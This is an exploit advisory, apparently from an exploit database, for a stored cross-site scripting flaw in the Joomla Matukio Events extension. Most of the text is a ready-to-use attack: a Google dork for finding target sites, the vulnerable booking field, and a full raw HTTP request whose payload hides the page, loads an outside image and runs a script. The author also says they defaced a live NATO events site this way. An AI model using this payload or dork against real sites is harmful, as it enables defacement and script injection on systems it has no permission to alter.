Share
## https://sploitus.com/exploit?id=PACKETSTORM:161682
# Exploit Title:Joomla Matukio Events 7.0.5 Stored XSS  
# Date:08.03.2021  
# Author: Vincent666 ibn Winnie  
# Software Link: https://matukio.compojoom.com/  
# Tested on: Windows 10  
# Web Browser: Mozilla Firefox  
# My Youtube Channel : https://www.youtube.com/channel/UCZOWpC2dW9sipPq5z63C2rQ  
# Google Dorks: inurl:option=com_matukio  
  
  
PoC:  
  
I found simple , but interesting stored xss in Matukio Events.  
  
https://matukio.compojoom.com/events/event/81-science/979-rocket-science  
  
Press "Book Now":  
  
Field "Comments" vulnerable to XSS and html code injection.  
  
Put xss code and save this. It's works with different codes.  
  
The code I like for the test:  
  
https://pastebin.com/4V9sS7V3  
  
  
Video:  
  
https://youtu.be/HlTEcDqNxSM  
  
Example on another site events.sto.nato.int  
  
https://www.youtube.com/watch?v=pBY2UskIuNU  
  
  
  
Host: matukio.compojoom.com  
  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0)  
Gecko/20100101 Firefox/86.0  
  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
  
Accept-Language: en-US;q=0.5,en;q=0.3  
  
Accept-Encoding: gzip, deflate, br  
  
Content-Type: multipart/form-data;  
boundary=---------------------------9492328303638924271813324098  
  
Content-Length: 2816  
  
Origin: https://matukio.compojoom.com  
  
Connection: keep-alive  
  
Referer: https://matukio.compojoom.com/events/book/979-rocket-science  
  
Cookie: d9122e5739e92113272e5173db43cd67=72qdv1oufsi2avknr7614genno;  
_ga=GA1.2.90714308.1615201744; _gid=GA1.2.178258541.1615201744  
  
Upgrade-Insecure-Requests: 1  
  
nrbooked=1&coupon_code=&field[3]=Mr&field[4]=&field[5]=azsxc&field[6]=ASD&field[8]=azsxc&field[9]=112233&field[10]=Zasx&field[11]=algeria&field[13]=vsdv@dklelw.de&field[14]=&field[15]=&field[16]=&field[17]=<style>body{visibility:hidden;}html{background:  
url(https://img5.goodfon.ru/wallpaper/nbig/6/5d/kholst-kraska-mazki-abstraktsiia-canvas-paint-brush-strokes.jpg)  
round;}</style><script>alert("Test  
XSS")</script>&agb=Yes&revoke=Yes&uuid=&task=book.book&semid=979&formId=1&61c98812f3351c5686829fce5947bf84=1  
  
(p.s.:  
I don't publicly test the Joomla extensions anymore, but this time I  
posted it publicly because I did xss art on the NATO site in this  
component.)